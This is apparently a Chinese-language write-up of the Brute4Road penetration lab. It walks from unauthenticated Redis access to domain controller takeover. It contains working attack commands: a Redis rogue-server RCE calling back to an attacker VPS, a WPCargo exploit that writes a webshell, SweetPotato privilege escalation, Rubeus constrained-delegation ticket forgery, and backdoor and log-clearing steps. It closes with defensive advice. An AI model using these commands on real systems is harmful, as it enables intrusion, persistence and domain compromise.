从Redis未授权到域控攻陷Brute4Road靶场实战全流程拆解靶场环境与攻击路径概览Brute4Road靶场模拟了一个典型的企业内网环境包含五台主机Redis服务器、WordPress站点、MSSQL数据库服务器、未启用NLA的客户端以及域控制器。攻击链路从外网Redis未授权访问漏洞切入经历内网代理建立、横向移动、权限提升最终通过约束委派攻击拿下域控。这种设计完美复现了红队评估中的常见攻击路径特别适合练习内网渗透的核心技术栈。关键主机与角色定位172.22.2.7Redis服务器初始突破口172.22.2.18WordPress站点二级跳板172.22.2.16MSSQL服务器域成员机172.22.2.34未启用NLA的客户端172.22.2.3域控制器最终目标第一阶段外网突破与立足点建立Redis未授权访问漏洞利用在扫描发现6379端口开放后确认存在Redis未授权访问漏洞。这里没有使用常见的写入SSH公钥方式而是采用更隐蔽的Redis主从复制RCE技术python3 redis-rogue-server.py --rhost 172.22.2.7 --lhost [VPS_IP] --port 21002技术要点选择Redis 5.x版本特有的主从复制漏洞使用非标准端口(21002)避免触发安全告警执行后立即建立伪终端维持会话稳定性注意主从复制攻击可能导致Redis服务崩溃生产环境中应作为最后手段权限提升与持久化控制获取初始shell后通过SUID提权读取首个flagfind / -user root -perm -4000 -print 2/dev/null base64 /home/redis/flag/flag01 | base64 --decode同时上传持久化后门在/tmp目录部署静态编译的busybox添加cron计划任务维持访问清理操作日志消除痕迹第二阶段内网渗透基础设施搭建代理通道方案选型对比在实战中测试了两种代理方案最终选择gost替代初始的frp工具类型稳定性配置复杂度适用场景frp反向代理中等高需要外网VPS中转gost正向代理高低直接内网穿透gost部署命令./gost -L:10001 代理配置技巧使用Proxifier管理多级代理链设置精确的代理规则减少暴露面定期检查通道存活状态内网信息收集方法论通过fscan进行自动化扫描后需要人工分析关键信息./fscan -h 172.22.2.0/24 -o res.txt重点关注内容存活主机拓扑关系域控制器识别端口88/389特殊服务开放情况如未启用NLA的主机网络共享信息SMB/NetBIOS第三阶段横向移动与权限提升WordPress站点攻陷利用WPCargo插件漏洞获取Webshellimport requests payload 2f49cf97546f2c24152b216712546f112e29152b1967226b6f5f50 requests.get(fhttp://172.22.2.18/wp-content/plugins/wpcargo/includes/barcode.php?text{payload}sizefactor.09size1filepath/var/www/html/webshell.php)后续操作通过蚁剑连接获取交互式shell提取wp-config.php中的数据库凭证在MySQL中查找敏感信息和第二个flagMSSQL服务器攻防使用获取的密码本爆破sa账户成功通过Multiple.Database.Utilization.Tools执行系统命令甜土豆提权关键步骤上传SweetPotato.exe到可写目录执行命令添加管理员账户通过RDP登录获取第三个flagC:/Users/Public/SweetPotato.exe -a net localgroup administrators jay17 /add第四阶段域环境突破域信息收集与可视化使用SharpHound收集域关系数据SharpHound.exe -c allBloodHound分析重点定位高价值目标域管理员、关键服务器分析ACL权限配置异常识别约束委派等危险配置约束委派攻击实战发现MSSQLSERVER配置了到DC的约束委派后实施完整攻击链使用mimikatz提取机器账户哈希通过Rubeus申请TGT票据伪造管理员票据访问域控.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:[BASE64_TICKET]最终通过伪造的票据访问域控文件系统获取最后一个flagtype \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt攻击链防御建议Redis服务启用认证密码绑定指定IP访问升级到最新版本域环境加固定期审计约束委派配置限制高权限服务的执行权限启用NLA网络级认证安全监控检测异常票据请求监控SharpHound等工具运行建立Kerberos异常行为基线